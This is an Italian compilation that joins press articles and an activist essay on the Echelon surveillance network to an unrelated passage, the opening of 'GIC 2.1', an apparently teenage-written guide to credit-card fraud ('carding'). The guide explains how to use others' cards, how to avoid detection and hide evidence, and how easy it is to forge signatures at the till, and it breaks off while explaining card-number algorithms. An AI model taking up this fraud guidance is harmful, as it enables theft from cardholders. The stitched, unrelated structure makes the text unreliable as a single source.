Non c'è niente che si possa fare contro le intrusioni della Nsa oltre il bombardamento di e- 
mail organizzato lo scorso 21 ottobre nel cosiddetto Echelon day? Per il momento la sfida 
più concreta sembra venire dalla Francia, dove uno studio legale ha annunciato un'azione 


penale e civile contro il governo Usa e quello britannico in rappresentanza di gruppi che si 
occupano dei diritti civili e di aziende che hanno denunciato di aver perso una serie di 
contratti a causa del "furto di informazioni". 


Articolo di Gian Antonio Righi-Tratto da Panorama OnLine 


Lo scandalo in USA 


Dopo il rapporto presentato al parlamento europeo una settimana fa, arrivano le prime, 
clamorose conferme e rivelazioni su Echelon e sugli abusi commessi utilizzando il network 
satellitare. Sono ex spie canadesi e americane a parlare per la prima volta. Mike Frost, 
che ha lavorato per l'intelligence canadese dal 1972 al 1992, ha raccontato alla televisione 
americana Cbs come la Thatcher si sia servita, a scopi di politica interna, di Echelon. 
«Non pensate che sia fantascienza. Qualsiasi cosa, dal trasferimento dei dati alle 
telefonate via cellulare fino ai bancomat e alle radio portatili che controllano le culle dei 
neonati, tutto viene captato dalle antenne e dai satelliti di Echelon» ha rivelato Frost. ( 
ragazzi, qui stiamo messi proprio male...) 


Che il Grande Orecchio sia un pericolo per la democrazia e per la privacy dei cittadini lo 
ha confermato un'altra ex spia, Margaret Newsham, che ha vissuto per anni nella base top 
secret inglese di Menwith Hill, la più importante, gestita direttamente dalla Nsa americana. 
«Quando arrivai lì ero convinta che avrei ascoltato conversazioni in russo, cinese o 
vietnamita. No, non era proprio così. Un giorno un mio collega mi disse: "Margaret vieni 
qui, ti faccio ascoltare qualcosa di veramente interessante". Presi la cuffia e mi rivolsi al 
mio amico: "Ma questi sono due americani". "Certo" mi fa lui. "Chi è quello che parla come 
un capo?". "Non lo conosci? È il senatore Strom Thurmond, sta telefonando dal suo ufficio 


al Congresso". Ecco cosa è capace di fare la Nsa: spiare anche i politici». 


Già un anno fa, la National security agency, l'agenzia più segreta dell'apparato spionistico 
americano, quella che ha più fondi e più uomini della stessa Cia, fu costretta ad 
ammettere di conservare nei suoi archivi ben mille pagine di informazioni su Lady Diana. 
Perché? 

Una terza spia, un ex funzionario della Nsa, Wayne Madsen, ha raccontato nei giorni scorsi 
che «la principessa Diana, nella sua campagna contro le mine, entrò in conflitto con la 
politica americana. Ecco perché la sua attivita' era di interesse primario per gli Stati Uniti. 
Ed ecco perché la Nsa la intercettava 24 ore al giorno». 


Non solo: quando gli spioni americani ritenevano che superasse i limiti, facevano arrivare 
alcuni brani delle conversazioni private di Diana ai tabloid inglesi. «Vi sembra strano? Vi 
sembra un film? Questo non è un romanzo di spionaggio. Questa è la realtà. Questo è il 
modo in cui Echelon funziona» conclude l'ex agente Frost. «Io lo so perché sono stato là, 
sono stato addestrato, ho lavorato per questo progetto che minaccia tutti: dai due ministri 
inglesi fino all'ultimo cittadino». 


E qui da noi? 


Lo STOA (Scientific and Technological Options Assessment ) e' un' unita' del Direttorato 
Generale della Ricerca, con sede a Strasburgo, che ha lo scopo istituzionale di fornire un 
supporto conoscitivo e orientativo a carattere tecnico-scientifico ai lavori del Parlamento 
Europeo. Le problematiche trattate da questa task-force di esperti vanno dalla medicina 
all'agricoltura, dall'urbanistica alle tecnologie di informazione e comunicazione, ecc... 


Il rapporto intitolato "Valutazione delle tecnologie di controllo politico" afferma 
perentoriamente che "In Europa tutte le telefonate, i fax e i test di posta elettronica sono 
regolarmente intercettati, e dal centro strategico inglese di Menwith Hill le informazioni di 
interesse vengono trasferite al quartier generale della National Security Agency, l'agenzia 
di spionaggio elettronico americana". 


Il network globale di spionaggio civile (ed è questa la grande novità !), fortunatamente, ha 
anche un nome suggestivo e per i giornali di tutto il Mondo è un invito a nozze: in Italia "il 
Mondo" è il primo a sparare la notizia in prima pagina e a dare il via ad un domino 
inarrestabile di reazioni che non risparmierà neanche la magistratura, il nostro Parlamento 
e l'Ufficio del Garante per la privacy. Tutti si interrogano sulla liceità dell'operazione e sul 
ruolo che una tale struttura a potuto avere nella copertura dei "misteri italiani" da Ustica al 


caso Moro. Ma nessuno si domanda quali siano le fonti del rapporto. 


Solo Libération punta il dito sulla credibilità del rapporto, affermando che è costruito 
soltanto su fonti indirette e giornalistiche: Somebody's listening (inchiesta del 1981 del 
giornalista inglese Duncan Campbell), Secret Power (libro cult del 1996 del neozelandese 
Nicky Hager), The Puzzle Palace ( libro del 1982 del giornalista americano James Bamford 
che descrive il pre-Echelon), l'agenzia Reuters, il Telegraph, il Times, il Guardian e poi le 
denunce di Amnesty International, della rivista di contro informazione Covert Action 
Quarterly, di Privacy International e di Statewatch, organizzazione inglese di monitoraggio 
sulle libertà politiche. 


Cronologia degli avvenimenti 


1943 si forma l'allanza BRUSA, BRitain - USA 
1947 si forma l'alleanza UKUSA, United Kingdom - USA 


1957 Affare Crypto AG 
1988 La prima volta in cui viene mensionato ECHELON. 
1996 backdoor nel software Lotus Notes 


1998 Il Parlamento europo riceve il rapporto su Echelon 
1999 Nuovo rapporto su ECHELON 


Sembrerebbe ( da quanto riferito da "La Repubblica" ) che Il rapporto Stoa sia stato voluto 
e commissionato alla Omega Foundation da Glyn Ford, deputato laburista del Parlamento 
europeo e direttore di Stoa. Il suo lavoro di lobby ,tra gennaio e settembre 1998, quando il 
Parlamento europeo vota una risoluzione, è intenso. Soprattutto in Inghilterra, tra verdi, 
laburisti, organizzazioni non governative, gruppi e associazioni della galassia dell'anti 
militarismo e delle battaglie per la privacy. La lobby di Ford non ottiene però buoni risultati 
sul piano politico, solo il titolo e un brevissimo accenno a Echelon nella Risoluzione che il 
Parlamento europeo vota nel settembre 1998. La "Risoluzione sulle relazioni transatlantiche e 
il sistema Echelon" riguarda una serie di problemi commerciali tra Ue e Usa e solo al punto 
14, il penultimo, recita: "La crescente importanza di Internet e delle telecomunicazioni 
mondiali in genere, e del sistema Echelon in particolare, richiedono misure precauzionali 
per quanto concerne le informazioni economiche". 
Solo un europarlamentare belga avanza un'ipotesi, e suggerisce che il sistema di 
intercettazioni Echelon sia coperto da accordi bilaterali segreti tra i vari paesi della Ue e gli 
Stati Uniti. 


E qui da noi? #2 
< areeechelon.gif> 


Nella cartina, la struttura dei centri d'ascolto noti di Echelon e le cinque aree territoriali che 
controllano attraverso un sistema di satelliti 


Ci si arriva da Manchester o da Edimburgo lungo le stradine dello Yorkshire. All'improvviso 
spuntano enormi globi bianchi. Se ne vedono 25 e ciascuno nasconde un'antenna puntata 
verso un satellite. Sembra una base lunare. Poi si nota un po' di vita, qualche guardia 
davanti ai recinti, alcune auto che entrano ed escono. Poco più in là si intravedono diversi 
edifici stile caserma. Dentro ci lavorano 1.500 statunitensi e un migliaio di britannici, che, 
24 ore al giorno, maneggiano i computer più avanzati e gli strumenti di ascolto più 
sofisticati del mondo. Benvenuti a Menwith Hill, sperduta landa del nord dell'Inghilterra, 
uno dei posti più segreti del pianeta. E anche dei più controversi. 


È qui che da oltre 50 anni opera Echelon. Sebbene ufficialmente di proprietà della Raf, la 
stazione è gestita dalla National security agency, la più imponente centrale americana di 
spionaggio, incaricata della sorveglianza elettronica, con un budget di 4 miliardi di dollari 
l'anno (uno più della Cia) e 40 mila agenti. Echelon è un progetto così segreto che, fino a 
qualche settimana fa, nessuna autorità politica ne aveva neppure ammesso l'esistenza. 
Ora una serie di rapporti declassificati confermano non solo che le intercettazioni 
elettroniche globali vanno avanti dagli anni della guerra fredda, ma che Echelon è stato 
potenziato negli ultimi dieci anni con stazioni di ascolto sparse in tutti i continenti, capaci di 
catturare e analizzare ogni telefonata, fax, telex, e-mail, spedito via satellite o via Internet 
in un posto qualsiasi del mondo. Attraverso un software chiamato N-gram, le cyber-spie 
possono scandagliare l'imponente traffico usando parole chiave o combinazioni di parole 
come Clinton, droga, bomba, terrorismo, contratto, Wall Street e via dicendo. 


Ancora più allarmanti sono i rapporti di due esperti, il giornalista inglese Duncan Campbell 
e Nikos Bogonikolos della società Zeus, che da martedì 22 febbraio vengono esaminati e 
discussi dalla commissione Libertà civili e affari interni del Parlamento europeo. Nei due 
documenti, destinati a riattizzare il fuoco di polemiche dell'Ue contro gli Stati Uniti, ma 
anche contro la Gran Bretagna, che si trova nella posizione singolarissima di essere 
contemporaneamente membro dell'Ue ma anche del progetto anglosassone, la 
conclusione è che Echelon è attualmente utilizzato soprattutto per lo spionaggio 
economico, per avvantaggiare cioè le imprese americane a danno di quelle europee e 
asiatiche. 


Più in generale, è abusato dalle agenzie spionistiche dei cinque paesi di lingua inglese per 
controllare singoli individui, in palese violazione delle rispettive costituzioni e leggi. Ecco 
perché dopo il Parlamento europeo, presto anche il Congresso americano aprirà 
un'inchiesta sulla Nsa. "Sono stupito" dice il deputato repubblicano della Georgia, Bob 
Barr, paladino della guerra a Echelon "che i paesi che operano assieme alla Nsa non 
abbiano finora chiesto di essere informati. E sono ancor più stupito perché, secondo le mie 
informazioni, vi partecipano tutti i paesi europei". 


Articolo di Laura Ronchi 


Links 


Tactical Media Crew 
Paul Wolf (attivista delle libertà civili) 


Control.alt del Tactical Media Crew 


Echelon, un lavoro sporco su Disinformation 


Stati Uniti, National Security Agency 


Gran Bretagna, Government Communications Head Quarters 


Canada, Communications Security Establishment 


Australia, Defense Signals Directorate 


Base americana di Menwith Hill 


13th Usasa Field Station sito ufficiale dell'associazione di Menwith Hill 
Base di Pine Gap in Australia. 


Base di Yakima nello stato di Washington 


Spero vi sia piaciuto questo articolo, anche se ci sia ancora poca carne al fuoco.Spero di 
poter scrivere un altro articolo sull' argomento appena se ne saprà di più. 


E ricordate, non siamo mai soli!!! 
ByeZ 


{Cujo} 


- Introduzione. - 

Siamo veramente liberi? 

Libertà significa avere la facoltà di vivere liberamente, di muoversi, di agire in modo autonomo, 
secondo la propria volontà e la propria natura, senza essere sottoposti a limitazioni o costrizioni. 
Libertà significa essere un individuo indipendente dalla potestà di un soggetto superiore, in particolare 
dello Stato, nell'esercizio di attività garantite come lecite dall'ordinamento. 

Ma siamo veramente liberi? 

Noi tutti, cittadini dell'Europa, abbiamo faticosamente imparato cosa vuol dire essere liberi, ma adesso 
siamo in pericolo di perdere di nuovo tante di queste libertà. 

Oggi gli Stati Uniti, la Gran Bretagna, il Canada, l'Australia e la Nuova Zelanda ci tengono sotto 
controllo! 

A rivelarlo ufficialmente è un recentissimo rapporto dello Stoa, della Direzione generale ricerca del 
Parlamento Europeo, secondo il quale ogni telefonata, ogni messaggio di posta elettronica, criptato 0 
meno, può essere intercettato, selezionato, decodificato e inserito in una potentissima banca dati 
computerizzata comune ai cinque Paesi in questione. 

Ufficialmente gli accordi servono alla lotta contro i grandi criminali ed alla protezione della sicurezza 
nazionale, ma coinvolgono tutta l'umanità. 

Il concetto di questo sistema è di registrare automaticamente ogni scambio di informazione - sia tramite 
telefono o cellulare, 

sia tramite fax, e-mail o ogni altra forma di posta elettronica. 

L'applicazione di questa tecnologia, implica sia il controllo dell'intera rete di comunicazione e di dati 
sia l'elaborazione di un profilo dei movimenti di un utente di cellulare. Sarebbe corretto, che ogni 
intercettazione di comunicazione telefonica fosse oggetto di autorizzazione preliminare, 
conformemente alle prescrizioni del Parlamento interessato. Ma nella maggior parte dei casi i servizi di 
polizia e di informazione non dovrebbero poter avvalersi di AUTO-autorizzazioni all'intercettazione, 
salvo quei casi molto particolari che dovrebbero comunque essere oggetto di comunicazione all'autorità 
che rilascia le autorizzazioni non appena possibile. 

I Paesi che non sono disposti ad accettare queste condizioni vengono sorvegliati contro la loro volontà, 
visto che le tecniche di intercettazione sono già incorporate nei sistemi di comunicazione esistenti come 
per esempio le linee ISDN. 

1. TECNOLOGIE DI SORVEGLIANZA. 

Le tecnologie di sorveglianza possono essere definite come dispositivi o sistemi di monitoraggio per 
tracciare e valutare i movimenti degli individui, delle loro proprietà e di altri averi. La maggior parte di 
queste tecnologie è usata per controllare le attività di dissidenti, attivisti dei diritti umani, giornalisti, 
leader studenteschi, minoranze, leader sindacali e oppositori politici. Tra le tante apparecchiature 
sofisticate usate per la sorveglianza, sono incluse le lenti a visione notturna, microfoni parabolici per 
captare conversazioni a voce a oltre un chilometro di distanza, versioni laser che possono registrare 
ogni conversazione da una finestra chiusa che si trovi in linea visuale. La camera stroboscopica danese 
Jai può prendere centinaia di foto in pochi secondi e fotografare individualmente tutti i partecipanti a 
una dimostrazione o a una marcia e i sistemi automatici di riconoscimento dei veicoli possono tracciare 
le auto in giro per una città attraverso un Sistema Informatico Geografico basato su mappe. 

Nella sorveglianza urbana, esistono sistemi automatici di riconoscimento delle facce. Essi saranno 
inizialmente introdotti in postazioni statiche, come cancelli girevoli, punti doganali, cancelli 
automatici, parti delle città a rischio, etc, per rendere possibile la scansione di una folla e comparare le 
facce immagazzinate in un computer remoto. Questi sistemi di sorveglianza sollevano significativi 
problemi di responsabilità, particolarmente quando trasferiti a regimi autoritari. Le camere usate nella 
piazza Tienanmen erano state vendute come sistemi avanzati per il controllo del traffico, ma dopo il 


massacro di studenti nel 1989, ne consegui' una caccia alle streghe quando le autorità torturarono e 
interrogarono migliaia di persone nello sforzo di scovare i sovversivi. 

Ecco come ogni persona, perde i propri diritti se solo si trova nel posto sbagliato al momento sbagliato! 
2.RETI DI INTERCETTAZIONE. 

C'è stato uno spostamento politico degli obiettivi negli ultimi anni. Invece di investigare sul crimine, le 
agenzie di polizia stanno sempre più tracciando determinate classi sociali e determinate razze di 
persone che vivono nelle aree a rischio - prima che il crimine sia commesso - una forma di polizia 
preventiva. Senza crittazione, i modemi sistemi di comunicazione sono virtualmente trasparenti di 
fronte alle avanzate apparecchiature di intercettazione che possono essere usate per l'ascolto. 

Tutti i telefoni mobili in un paese, quando attivati, sono un ottimo mezzo per rintracciare i loro 
possessori in ogni momento, con un margine d'incertezza di poche centinaia di metri. Anche se nessuno 
nega il ruolo di queste reti nelle operazioni antiterrorismo e contro il traffico illegale di droga, il 
lavaggio di denaro sporco e le compravendite illecite di armi, bisogna ugualmente esprimere il proprio 
allarme per quanto conceme la protezione dei dati personali e per la salvaguardia della PRIVACY. 

La possibilità di intercettare qualsiasi comunicazione è unita ad una crittografia troppo debole, che 
rende insicuro qualsiasi mezzo di trasmissione e permette agli Stati Uniti di spiarci senza alcun nostro 
controllo. 

La FRANCIA non ritiene che la liberazione della crittografia, possa ostacolare le attività di indagine 
delle Forze dell'ordine, e annuncia delle linee guida, quali: 

* liberalizzazione completa dell'uso della crittografia; 

* impiego di chiavi da 128 bit ( in precedenza erano consentite chiavi da soli 40 bit); 

* eliminazione del ricorso obbligatorio alle Entità di certificazione per il deposito delle chiavi; 

* Emanazione di norme sull'obbligo di decifrazione dei documenti a richiesta dell'Autorità Giudiziaria; 
* Gli Stati Uniti, pero', sono il paese che detiene la leadership in materia di crittografia, e anche se 
all'estero ci sono fior di scienziati, non c'è nessun altro stato che ha investito in modo cosi' massiccio 
nello sviluppo dei sistemi di intercettazione. 

Siamo dunque seri, vogliamo credere che si possa impedire facilmente agli americani di ficcare il naso 
negli affari di tutto il mondo? Una crittografia può rendere solo più complessa, e a volte inutile, 
l'attività dell'intercettazione, ma non impedirla. 

Esistono essenzialmente due sistemi separati, precisamente: 

1. Il sistema UKUSA che comprende le attività di agenzie di intelligence militare come NSA - CIA 
negli USA che incorpora GCHQ e M16 in UK, che operano congiuntamente un sistema conosciuto 
come ECHELON 

2. Il Sistema EU- FBI che concatena assieme varie agenzie di ordine pubblico come FBI, polizia di 
stato, dogane, immigrazione e sicurezza interna. 


"IL SISTEMA ECHELON". 

COS'E"? 

Echelon è un sistema di controllo mondiale sviluppato e coordinato dalla NSA americana (National 
Security Agency). 

L'Echelon fa parte di un sistema di spionaggio sviluppato durante la guerra fredda, in seguito 
all'accordo "Ukusa" del 1947 tra gli Stati Uniti e la Gran Bretagna. Il Canada, l'Australia e la Nuova 
Zelanda, partecipano, accanto agli Stati Uniti, a questo progetto. Questo sistema d'informazione è stato 
descritto per la prima volta dal neozelandese Nicky Hager, nel suo libro "Segret Power ". L'inchiesta di 
Hager e le sue scoperte sui "dizionari" di Echelon, hanno portato alla luce uno dei maggiori e più 
segreti progetti dei servizi di intelligence. 

COME FUNZIONA? 


Il primo componente di questo sistema è costituito dalle cinque grandi basi Ukusa, da cui vengono 
intercettate le comunicazioni che passano attraverso i 25 satelliti geostazionari Intelsat, usati dalle 
compagnie telefoniche di tutto il mondo per le comunicazioni internazionali. 

L'ultima generazione di satelliti spia, è costituita da tre nuovi "bird" geosincronici, messi in orbita negli 
ultimi quattro anni. 

Quello che copre l'Europa, staziona in orbita a 22.300 miglia di altitudine sopra il Corno dell'Africa ed 
è controllato dalla base terrestre inglese di Menwith Hill, nel nord del Yorkshire, che con i suoi 22 
terminali satellitari è la più grande della rete Ukusa. Il sistema Ukusa è costituito da una griglia di super 
computer in rete - battezzati "dizionari"- capaci di assorbire, esaminare, filtrare in tempo reale enormi 
quantità di messaggi digitali e analogici, estrapolare quelli contenenti ognuna delle parole - chiave 
programmate, decodificarli e inviarli automaticamente al quartier generale del servizio di intelligence 
dei cinque paesi interessati ai messaggi. 

Periodicamente i dictionary manager , cambiano la lista delle parole chiave, inserendone delle nuove a 
seconda dei temi politici del periodo. 

Ecco ad esempio un elenco di parole chiave: 

Bags Bunny, Verisign, Secure, ASIO, Lebed, Ice, Lexis- Nexis, Flir, Jic, bce, Lacrosse, Flashbangs, 
IRA, DIA, BOP, BMDO; site, SASSTIXIS, benelux, SAS, Lander, AT, SHAPE, SABENA, GSM, 
Exon Shell. 

DOVE SONO LE BASI TOP SECRET? 

Le intercettazioni vengono fatte da cinque basi segrete, che orientano le enormi parabole sui satelliti di 
comunicazione Intelsat: la base neozelandese di Waihopai ancora sul Pacifico; 

la base britannica di Morwenstow in Cormovaglia è puntata sui satelliti dell'Atlantico, dell'Europa e 
dell'Oceano Indiano; la base americana di Sugar Grove, in Virginia, intercetta quelli del nord e sud 
America; la base USA di Yakima, nello stato di Washington, punta sul Pacifico; la base australiana di 
Gerldton intercetta i satelliti dell'Oceano indiano. Una seconda rete di intercettazione è costituita dalle 
basi che captano le comunicazioni che transitano su altri satelliti( tra cui quelli russi): Menwith Hill in 
Inghilterra, Shoal Bay in Australia, Leitrim in Canada, Bad Aibling in Germania, Misawa in Giappone 
e la segretissima Pine Gap in Australia. 

Un sistema di strutture che monitora direttamente le comunicazioni via terra è l'elemento finale del 
sistema ECHELON. Oltre alle comunicazioni satellitari e radio, esiste un altro modo per intercettare, 
ed è, quello di cavi sottomarini, che passano sotto gli oceani, e reti a microonde sulla terra ferma. 
Pesanti cavi, posati nel fondo marino, si fanno carico delle comunicazioni internazionali mondiali. 
Dopo che escono dall'acqua ed arrivano sulla terraferma le microonde divengono molto vulnerabili alle 
intercettazioni. 

CHE SPERANZE ABBIAMO? 

La libertà non è ancora completamente persa. 

In altri dodici paesi della UE, il dibattito sui diritti dell'umanità, deve ancora iniziare. Qui' si tratta della 
libertà e della dignità dell'uomo - e ha solo poco a che fare con servizi informativi, sistemi di 
spionaggio modificati e sistemi di sorveglianza pienamente elettronizzati. 

Siamo seduti su una bomba atomica - gigaherz incontrollabile della società informativa dell'avvenire. 
Solo insieme possiamo disattivarla. Uniamoci e agiamo in nome della libertà e della democrazia! 
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Eccoci qui alla versione 2.1 della GIC (Guida Italiana al Carding). 

Ricordo a tutti il xchè di questo nome: la guida non è italiana perchè la migliore in Italia ( magari !! ) ma perchè è una delle 
poche scritte in italiano da un italiano.. Quindi non crediate che il nome l'ho scelto a caso !! 

E siamo arrivati alla versione 2.1 di questa guida, che nella sua prima versione ha avuto un successo pari a zero, ma che si è 
ripresa nella seconda versione con grinta. Ora siamo arrivati alla release 2.1. Perché 2.1 e non 3.0 ? 

Perché non ci saranno cambiamenti radicali rispetto alla 2.0, ci sarà qualche aggiunta e qualche correzione ti tipo 
ortografico e qualche rivisitazione dei concetti.. 

Ma con la versione 2.1 non si esaurisce certo l'argomento, anzi come ho detto nelle precedenti edizioni: "..tenete d'occhio il 
sito dalla quale avete scaricato questa guida, perchè potete stare sicuri che ne usciranno nuove versioni.." 

La distribuzione della presente guida è libera, pertanto potete pubblicarla sui vostri siti senza problemi. 

Questa nuova versione è completamente rinnovata, sia come contenuti sia come impostazione. 

Naturalmente non tutto il materiale contenuto in questa guida è di mia esclusiva proprietà mentale, la maggior parte 
comunque lo è, ma è stato scritto e pubblicato da altri, che tenterò di elencare nei ringraziamenti, se mi dimentico di 
qualcuno scrivetemi pure e aggiungerò il vostro nome. 


DISCLAIMER: 

Si ricorda a tutte le persone che entreranno in possesso di questa guida che la presente è stata scritta da un povero malato 
mentale (che sarei io) in preda a manie di grandezza. 

Quanto leggerete quindi è frutto di pura fantasia ed è tutto puramente teorico. Nessuno, tantomeno l'autore (Screener_it) o 
chi distribuirà questa guida, può essere ritenuto responsabile dell'uso che ne verrà fatto. 

L'autore comunque si dissocia da qualsiasi atto criminale, offensivo della morale comune o dannoso compiuto da persone 
che hanno letto questa guida. 

Quanto scritto quindi è stato scritto quindi a scopo puramente informativo e/o scherzoso. 

Ogni riferimento a cose e/o fatti reali è puramente casuale e non voluto. 


AGGIUNTE RISPETTO ALLA GIC 2.0: 
Sapete cosa sono le tre y ? 

Cos'altro guardano i venditori ? 

Correzioni ortografiche e di fondo a tutta la guida 


INTRODUZIONE: 

Ancora 20 giorni e poi me ne vado in Irlanda per 2 settimane... Qualcuno vuole seguirmi ? NO ??? Dai ragazzi, stiamo in 
casa famiglia, abbiamo le chiavi, possiamo entrare e uscire quando vogliamo.. 

Non ve ne frega niente ? Vabbè, io ci ho provato a convincervi.. 

Sono convinto che in fondo qualcuno interessato come me al carding ci deve essere. 

Vediamo di cosa parleremo: 
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Carding.. Cos'è ? 

Chi ha letto la prima versione della guida può passare oltre, credo che ormai abbia capito cos'è il carding. Per i nuovi 
vediamo di dare una definizione il più ampia e chiara possibile. 

Il carding è l'arte di utilizzare carte di credito (dette anche cc) non propriamente nostre a nostro favore. 

Per esempio per fare acquisti, abbonamenti a siti xxx, dimostrare di avere 18 anni, ecc.. 

Come fare a procurarsi una cc ? 

Ci sono molti modi per procurarsi cc non nostre, in questa guida passeremo in rassegna i più importanti e farò un piccolo 
commento per ognuno. 

Ma il carding è reato ? 

Sì, il carding (utilizzare le carte di credito di altri) è un reato. E molto grave anche. Quindi attenzione. Non vorrete mica 
sporcarvi la fedina penale a 16 anni ? No, aspetta, sono io ad avere 16 anni.. Vabbè, fa lo stesso. 

Ma è sicuro ? 

Se prendete le giuste precauzioni il carding può essere anche abbastanza sicuro, ricordatevi comunque che stanno fregando 
la legge, quindi non crediate mai di essere sicuri. 

Siate paranoici, controllate sempre tutto e non andate in giro dicendo cosa sapete fare. Agite nell'ombra. Mettete tutto ciò 
che riguarda il carding in posti sicuri, non tenetevi gli scontrini delle cc (vi spiegherò più avanti a cosa servono) nel cassetto 
del comodino !!! 


Cosa sono le carte di credito ? 

Questa può sembrare una domanda stupida, in realtà è molto intelligente e scommetto che il 99 % delle persone che sta 
leggendo questa guida non saprebbe rispondere correttamente e in modo completo. 

La risposta di molti: 

Quel pezzo di plastica con una striscia che serve per pagare merci e servizi. 

Secondo voi è giusto ? Bhè, se ve lo chiedo vuol dire che tanto giusto non è. Cosa voglio dire ? Che è un affermazione falsa 
? No, voglio semplicemente dire che è un affermazione vera solo in parte. 


Infatti è vero, una carta di credito è un "pezzo di plastica" (evviva i termini tecnici) che serve per pagare, ma lo è anche una 
carta di debito. 


‘Spiega meglio 'sta storia delle carte di credito e delle carte di debito.. 


Ok. Come ben sai esistono le carte di credito. Ma esistono anche le carte di debito. 
Esternamente sono simili, ma il loro uso è molto diverso. 

Vediamo come sono fatte esternamente le carte di credito: 

Sono di plastica e presentano due facce, una anteriore e una posteriore 


- sulla faccia anteriore sono presenti: 


nome e cognome del titolare della carta 

il numero della carta di credito nel formato YYYY XXXX WWWW VVVVv 
la data di scadenza 

nome ed eventuale logo dell'organizzazione che ha emesso la carta 


- sulla faccia posteriore sono invece presenti: 


e striscia magnetica nera che corre lungo tutto il dorso della carta 
e firmadeltitolare della carta 


Adesso vediamo come sono fatte le carte di debito: 
Sono di plastica e presentano due facce, una anteriore e una posteriore 


- sulla faccia anteriore sono presenti: 


nome e cognome del titolare della carta 

il numero della carta di credito nel formato YYYY XXXX WWWW VVVV 
la data di scadenza 

nome ed eventuale logo della banca che ha emesso la carta 


- sulla faccia posteriore sono invece presenti: 


e striscia magnetica nera che corre lungo tutto il dorso della carta 
e eventualiloghi tipo "Bancomat", "Fast Pay", ecc.. Variabili comunque da carta a carta 


Esternamente quindi carte di credito e carte di debito sono simili, quasi uguali.. Voglio però attirare la vostra attenzione su 
un particolare, non da poco, come vedremo poi. 

Sulla faccia posteriore della carta di credito infatti è presente la firma del titolare, mentre sulla faccia posteriore della carta 
di debito non è presente la firma. E non è un particolare da poco. Anzi !!! Andiamo avanti e capiremo il perché. 

Una nota per gli appassionati del genere: in Olanda e in Germania su alcune carte di credito è presente anche la foto del 
propietario. La foto non è incollata ma è stampata insieme alla carta, quindi non è modificabile. Quindi con le carte degli 
stranieri io eviterei di fare acquisti in negozi... Comunque vi spiegherò tutto più avanti.. 

Adesso che abbiamo visto le differenze fisiche delle due carte, adesso vediamone il funzionamento. 


Immaginate di essere in un negozio, vicino alla cassa. Vedete una signora che va a pagare alla cassa con una carta di 
credito. La consegna alla commessa che passa la banda magnetica nel lettore e aspetta un po'... Dopo un po' sentirete un 
rumore provenire dalla macchinetta e vedrete che sta stampando uno scontrino. La commessa lo porge alla signora, che 
prende una penna e lo firma. Dopo di che la commessa consegna una copia dello scontrino alla signora e l'altra copia la 
tiene lei. Che fine facciano quei due scontrini lo vedremo poi. 


Adesso sta andando alla cassa un'altra signora. Estrae una carta di debito e la consegna alla signorina che fa passare la 
banda magnetica della carta nel lettore della macchinetta. Poi porge alla signora un tastierino collegato alla macchinetta e 
chiede alla signora di digitare il PIN. 


Dopo che la signora ha schiacciato su un paio di numeri esce fuori dalla macchina uno scontrino, di cui una copia viene 
data alla signora e l'altra la tiene la commessa. 


Ricapitolando: 

quando si paga con una carta di credito è necessario fare la firma sullo scontrino, e in teoria la firma dovrebbe essere 
confrontata con quella che c'è sul retro della carta, ma questo non succede mai. 

Quando si paga con una carta di debito è necessario invece digitare un PIN per poter pagare con essa. 

Differenza non da poco. Ditemi quanto ci vuole a fare una firma falsa.. Chi si fa le giustificazioni false a scuola lo sa, basta 
poco. Ora ditemi quanto ci vuole a trovare un PIN. Parecchio, vero ? 


Carte di credito.. Un po' di info in più.. 
Allora.. Le carte di credito si dividono al loro interno in carte di credito bancarie e carte di credito T & T. 
Carte di Credito Bancarie 


Allora...Le carte di credito bancarie sono emesse dalle banche stesse e attestano l'esistenza di un fido concesso da una banca 
e assicurano la solvibilità dei loro titolari nei confronti degli esercizi commerciali che le accettano. 

In parole povere ? Queste carte garantiscono la presenza di un conto corrente intestato al titolare della carta presso la banca 

che l'ha emessa. 

Le carte di credito bancarie più diffuse (e accettate) sono la Bank Americard e la Carta SI, alla quale sono collegati i marchi 
VISA, EUROCARD e MASTERCARD. A parte rarissime eccezioni sono accettate anche all'estero. 


Carte di Credito T&T 


Queste sono in assoluto le carte di credito più accettate al mondo. Esse infatti sono emesse da organizzazioni parabancarie 
di grande importanza e peso. Quindi sono accettate anche all'estero 

Essendo organizzazioni parabancarie i titolari delle carte di credito T & T non hanno presso le organizzazioni depositi in 
denaro, ma indicano all'organizzazione la banca e il conto corrente da dove possono prelevare. 

In genere queste carte consentono ai loro possessori possibilità di spesa MOLTO alta. 

Queste carte di credito richiedono una quota annua associativa (si parte in media da un minimo di 50.000 £ annue). 

Le più diffuse sono il Diners Club International e l'American Express. 


Carte di debito.. Un po' di info in più.. 


Come vedete sta venendo fuori un cesso, perché voglio parlarvi allo stesso passo sia delle carte di credito che delle carte di 
debito, al contrario nella versione 1 della guida avevo completamente saltato le carte di debito, reputando che erano di 
scarso interesse.. Spero di dovermi ricredere.. 


Le carte di debito sono emesse da banche che hanno presso di loro un conto corrente intitolato al titolare della carta di 
debito e quindi ne assicurano la solvibilità (garantiscono insomma di pagare le operazioni svolte dal titolare della carta). 
Quasi mai viene richiesta una quota associativa, le operazioni vengono addebitate direttamente sul conto corrente del 
titolare della carta, sotto la voce Pagamento POS e valuta in giornata (questo per chi come me fa' anche economia 
aziendale). 

Sono molto meno accettate delle carte di credito, e comunque sempre a livello nazionale, non mi risulta che siano accettate 
anche all'estero. 

Permettono anche di fare prelievi in contanti presso gli sportelli Bancomat della banca che l'ha emessa o presso una banca 
che ha accordi con quella emittente. 

La carta di debito più diffusa è il BANCOMAT, risultato di un accordo fra quasi tutte le banche. Infatti tramite il Bancomat 
credo che si possa prelevare presso tutti gli sportelli Bancomat, anche se di un'altra banca. Sempre se sapete il PIN della 
carta. 


Ma il codice delle carte di credito/debito da dove deriva? 


Altra domanda che può sembrare stupida, ma invece è molto intelligente.. 


Infatti c'è gente che crede i codici delle carte di credito/debito sono in ordine crescente.. Non fate facce stupide, dicendo: 
"Che gente che c'è a questo mondo.." xchè magari lo credevate anche voi fino a poco tempo fa. 

Comunque il codice delle carte di credito/debito, quello in formato YYYY XXXX WWWW VVVV, deriva da un 
algoritmo. Un momento, mettiamo i puntini sulle i. Le prima quattro cifre (in questo caso YYYY}) identificato il tipo di 
carta e la banca di appartenenza. 

Ad esempio il 4052 identifica un VISA emessa dalla First Bank di Cincinnati. 

Le altre 12 cifre (divise in gruppi da 4 cifre l'uno) sono il risultato di un algoritmo, come dicevamo prima. 

Cosa cazzo è un algoritmo ? 

Un algoritmo è una o più operazioni matematiche che può servire a varie cose. Può servire a criptare messaggi, oppure a 
verificare se una carta di credito è valida. 

Non so se avete capito.. Vi faccio un esempio di algoritmo con due cifre. L'algoritmo è X = Y+1. 

